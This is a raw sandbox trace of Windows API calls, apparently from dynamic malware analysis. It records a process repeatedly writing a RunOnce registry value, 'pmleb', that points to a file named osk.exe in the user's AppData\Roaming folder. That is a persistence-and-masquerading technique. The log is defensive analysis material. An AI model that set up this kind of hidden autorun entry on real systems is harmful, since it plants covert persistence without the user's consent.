pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.970] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x57 [0081.970] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.971] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.971] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.971] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.971] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.971] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.971] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.971] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.971] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.971] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.971] RegCloseKey (hKey=0x280) returned 0x0 [0081.972] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.972] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.972] SetTimer (hWnd=0x20280, nIDEvent=0x20d3, uElapse=0xa, lpTimerFunc=0x0) returned 0x20d3 [0081.972] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.983] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.983] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.984] KillTimer (hWnd=0x20280, uIDEvent=0x20d3) returned 1 [0081.984] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.984] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.984] IUnknown:Release (This=0x787518) returned 0x1 [0081.984] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.984] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.984] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.985] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.985] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.985] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.985] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.985] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.985] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.985] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x58 [0081.985] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.985] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x59 [0081.985] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.986] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x58 [0081.986] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.986] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.986] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.986] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.986] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.986] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.987] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.987] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.987] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.987] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.987] RegCloseKey (hKey=0x280) returned 0x0 [0081.987] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.988] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.988] SetTimer (hWnd=0x20280, nIDEvent=0x20d4, uElapse=0xa, lpTimerFunc=0x0) returned 0x20d4 [0081.988] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.999] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.999] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.999] KillTimer (hWnd=0x20280, uIDEvent=0x20d4) returned 1 [0082.000] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.000] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.000] IUnknown:Release (This=0x787518) returned 0x1 [0082.000] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.000] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.000] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.000] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.000] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.000] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.000] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.000] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.000] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.000] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x59 [0082.001] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.001] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5a [0082.001] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.002] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x59 [0082.002] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.002] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.002] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.002] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.002] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.002] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.002] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.002] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.002] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.003] RegCloseKey (hKey=0x280) returned 0x0 [0082.003] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.003] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.003] SetTimer (hWnd=0x20280, nIDEvent=0x20d5, uElapse=0xa, lpTimerFunc=0x0) returned 0x20d5 [0082.003] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.015] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.015] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.015] KillTimer (hWnd=0x20280, uIDEvent=0x20d5) returned 1 [0082.015] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.015] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.015] IUnknown:Release (This=0x787518) returned 0x1 [0082.016] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.016] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.016] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.016] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.016] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.016] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.016] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.016] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.016] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.017] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5a [0082.017] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.017] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5b [0082.017] 